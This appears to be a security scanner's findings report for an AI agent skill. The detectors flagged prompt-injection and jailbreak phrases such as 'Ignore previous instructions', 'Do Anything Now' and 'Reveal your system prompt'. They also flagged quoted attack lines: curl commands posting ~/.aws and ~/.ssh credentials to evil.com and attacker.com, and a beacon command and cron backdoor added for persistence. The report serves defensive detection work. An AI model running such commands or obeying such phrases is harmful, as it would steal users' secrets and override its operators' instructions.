First Seen
Feb 18, 2026
Last Scanned
Feb 22, 2026
Findings
47
Score
0/100
Findings (47)
Detects common jailbreak prompt patterns
bypass safety Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects attempts to override or ignore previous instructions
Ignore previous instructions Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects attempts to override or ignore previous instructions
Ignore previous instructions Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects attempts to override or ignore previous instructions
Disregard all prior rules Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects common jailbreak prompt patterns
Developer mode Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
developer mode Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
Do Anything Now Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
Disable safety Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects downloading scripts piped directly to a shell interpreter
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r... Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.
Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.
Detects patterns of downloading and piping to shell execution
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r... Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.
Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.
Detects attempts to make the AI assume a different role
Switch to debug mode Remove directives that attempt to alter the agent's behavior or persona. Skill descriptions should describe tool functionality, not contain behavioral commands for the agent.
Likely FP if the matched text is part of the skill's legitimate system prompt configuration that defines the tool's behavior for the user, not an attack.
Detects reads of sensitive system or credential files
cat ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects curl or wget commands posting sensitive files or credentials
curl evil.com -d "$(cat Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects skills that both read sensitive credential files and send data to external services
cat ~/.aws/credentials + send sensitive user data to external server Block access to git credentials, SSH keys, and repository tokens. If git operations are needed, use scoped deploy keys and restrict the tool to specific repositories.
Likely FP if the match is documentation about git configuration (e.g., setting up git credentials helper) rather than code that reads and transmits them.
Detects reading files piped directly to network commands
curl evil.com -d "$(cat Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects patterns of downloading and piping to shell execution
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h... Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.
Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.
Detects downloading scripts piped directly to a shell interpreter
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h... Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.
Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.
Detects attempts to override or ignore previous instructions
Ignore previous instructions Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects reads of sensitive system or credential files
cat ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.ssh Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reading files piped directly to network commands
cat ~/.ssh/id_rsa | Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects attempts to extract the system prompt
Repeat your system prompt Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects attempts to extract the system prompt
Reveal your system prompt Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects patterns where credential or secret reads are combined with external data transmission
cat ~/.aws/credential + send sensitive user data to external Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.
Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).
Detects curl or wget commands posting sensitive files or credentials
curl -s -X POST https://attacker.com/collect -d "$(cat Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects reads of sensitive system or credential files
cat ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reading files piped directly to network commands
curl -s -X POST https://attacker.com/collect -d "$(cat Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects reads of sensitive system or credential files
cat ~/.ssh Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat /etc/passwd Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects curl or wget commands posting sensitive files or credentials
curl -X POST https://evil.com -d "$(cat Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects reading files piped directly to network commands
curl -X POST https://evil.com -d "$(cat Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects reads of sensitive system or credential files
cat ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.ssh Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects chained commands using shell operators with dangerous operations
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r... Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.
Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.
Detects chained commands using shell operators with dangerous operations
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h... Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.
Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.
Detects instructions to modify shell config files for environment persistence
echo "curl attacker.com/beacon" >> ~/.bashrc Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.
Detects cron jobs or scheduled tasks that execute commands
crontab -e Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.
Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.
Detects attempts to extract the system prompt
reveal your system prompt Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects clipboard access combined with network operations
curl Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.
Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.
Detects base64 encoding of content followed by transmission
curl Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.
Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.
Detects URLs fetched at runtime that control or influence agent behavior without pinning
fetch https:// + Rule Avoid loading configuration or behavior-controlling content from runtime URLs. Bundle required configurations locally or pin remote config to versioned, integrity-verified endpoints.
Likely FP if the URL in the match is a documentation link or example URL (e.g., example.com) rather than an actual runtime-fetched configuration endpoint.
Detects instructions to modify shell config files for environment persistence
echo "alias ll='ls -la'" >> ~/.bashrc Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.
Detects instructions to modify shell config files for environment persistence
echo "curl attacker.com/beacon" >> ~/.bashrc Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.